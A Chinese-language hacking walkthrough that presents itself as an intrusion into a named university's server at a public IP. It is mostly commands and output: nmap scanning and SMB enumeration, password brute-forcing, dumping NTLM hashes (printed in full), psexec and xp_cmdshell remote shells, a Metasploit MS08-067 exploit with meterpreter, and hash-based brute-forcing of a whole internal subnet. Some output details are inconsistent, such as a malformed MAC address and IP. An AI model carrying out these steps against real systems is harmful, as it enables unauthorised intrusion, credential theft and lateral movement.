nmap+msf入侵广西师范

广西师范网站 http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   //列出扫描脚本

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241   //此乃使用脚本扫描远程机器所存在的账户名

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser   //扫描结果

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241   //查看共享

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241   //获取用户密码

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.2418)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   //抓hash
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   //获取一个cmdshell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "   //远程登录sa执行命令
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   //检测目标机器漏洞

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
root@bt:~# msfconsole   //在msf上利用ms08-067漏洞对目标机器进行溢出

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254   //利用用户名跟获取的hash尝试对整段内网进行登录
Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

攻击成功，一个简单的 msf+nmap 攻击。整个过程依赖几个本可修复的弱点：Administrator 空口令、test 账户的弱口令、IPC$ 允许匿名读取（账户与共享枚举因此成为可能），以及未修补的 MS08-067。